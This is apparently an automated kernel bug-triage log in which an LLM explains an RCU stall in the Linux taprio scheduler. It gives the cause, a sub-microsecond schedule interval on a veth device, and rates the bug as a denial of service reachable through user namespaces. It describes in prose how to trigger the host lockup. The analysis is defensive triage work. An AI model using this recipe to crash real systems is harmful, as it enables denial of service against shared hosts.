Results: map[DenialOfService:true Exploitable:false FilesystemTrigger:false NetworkTrigger:false PeripheralTrigger:false RemoteTrigger:false Unprivileged:false UserNamespace:true VMGuestTrigger:false VMHostTrigger:false]
|
| 86/2 |
2026/05/24 13:32 |
llm |
expert |
0m
Model:
Tokens:
input: 78066
output: 631
thoughts: 438
Thoughts: **My Analysis of the `taprio` Scheduler RCU Stall**
Okay, the results are in. Time to solidify my understanding and craft the final response. This boils down to a fascinating bug within the `taprio` packet scheduler (`net/sched/sch_taprio.c`). Essentially, it's an RCU stall.
The root cause? A cleverly crafted, yet ultimately flawed, configuration. Someone's setting up a `taprio` schedule with an absurdly small `interval` – let's say, a mere 257 nanoseconds – on a high-speed interface like a `veth` device, which defaults to 10 Gbps. That's the key.
The `taprio` scheduler relies on an hrtimer, specifically `advance_timer`, to drive the schedule forward. When this timer fires, `advance_sched()` kicks in, calculating the *next* expiration time by simply adding the `interval` of the subsequent schedule entry. The problem arises when this `interval` is so minuscule that it's smaller than the time it actually *takes* the CPU to run `advance_sched()` and handle the timer interrupt. We're talking about a typical overhead of around 500 nanoseconds here.
Because the timer is "advancing" slower than real time, it's *always* expired. So, `__hrtimer_run_queues()` gets stuck in a loop, relentlessly calling `advance_sched()` in a desperate attempt to catch up to the current time, represented by `basenow`. But here's the kicker: `basenow` *stays* constant within the loop. Therefore, it'll take millions of iterations to converge, at which point real time will have surged ahead even further, causing the next timer interrupt to fire immediately, and the cycle continues. The gap just widens.
Essentially, the CPU gets permanently trapped in the softirq context, obsessively handling hrtimers. This ultimately leads to an RCU stall and, ultimately, a full CPU lockup – a complete denial of service.
The good news is that this isn't an attack vector for memory corruption or privilege escalation. It's just a nasty logic error causing an infinite loop. However, it can still be exploited by an unprivileged user, *if* user namespaces are enabled. Configuring these qdiscs requires `CAP_NET_ADMIN`, which can be achieved through user and network namespaces. Inside the namespace, a malicious user could craft a `veth` interface and attach this flawed `taprio` qdisc, potentially causing this issue.
|
| 87/1 |
2026/05/24 13:32 |
action |
format-explanation |
0m
Results: map[Explanation:**Analysis of the Bug**
The bug is an RCU stall (CPU lockup) in the `taprio` packet scheduler
(`net/sched/sch_taprio.c`).
**Root Cause:**
The `taprio` qdisc uses an hrtimer (`advance_timer`) to advance through its
schedule entries. When the timer fires, the `advance_sched()` function
calculates the next expiration time by adding the `interval` of the next
schedule entry to the current expiration time.
The kernel attempts to validate that the `interval` is large enough to transmit
at least one minimum-sized Ethernet frame (`ETH_ZLEN`), which depends on the
link speed of the network interface. However, on high-speed virtual interfaces
like `veth` (which defaults to 10,000 Mbps), this minimum duration
(`min_duration`) evaluates to a very small value (e.g., 48 nanoseconds).
An attacker can configure a taprio schedule with an `interval` slightly above
this minimum (e.g., 257 ns). Because 257 ns is significantly smaller than the
time it takes the CPU to execute `advance_sched()` and process the timer
interrupt (which typically takes ~500 ns or more), the timer's expiration time
advances slower than real time.
When the hrtimer subsystem processes expired timers in `__hrtimer_run_queues()`,
it loops over all expired timers until their expiration time is in the future
relative to a fixed `basenow` timestamp. Since `advance_sched()` only advances
the timer by 257 ns per iteration, it takes millions of iterations to catch up
to `basenow`. By the time the loop finishes, real time has advanced even
further, causing the timer hardware to immediately fire another interrupt and
repeat the process with an even larger gap. This permanently traps the CPU in
softirq context, leading to an RCU stall and a complete system lockup.
**Security Impact:**
* **Exploitable:** No. This is purely a logic error resulting in an infinite
loop. It does not cause memory corruption, out-of-bounds accesses, or
use-after-free conditions, so it cannot be exploited for privilege escalation or
arbitrary code execution.
* **Denial Of Service:** Yes. The bug permanently hogs a CPU core in an
interrupt context, leading to RCU stalls, watchdog panics, and a complete system
freeze.
* **Accessible From User Namespaces:** Yes. Configuring a qdisc requires the
`CAP_NET_ADMIN` capability. An unprivileged user can obtain this capability by
creating a new user namespace and a new network namespace. Inside this isolated
environment, they can create a `veth` interface and attach the malicious taprio
qdisc to it, crashing the host system.
* **Accessible From Unprivileged Processes:** No. Without user namespaces, a
standard unprivileged process does not have the required `CAP_NET_ADMIN`
capability to configure network schedulers.]
|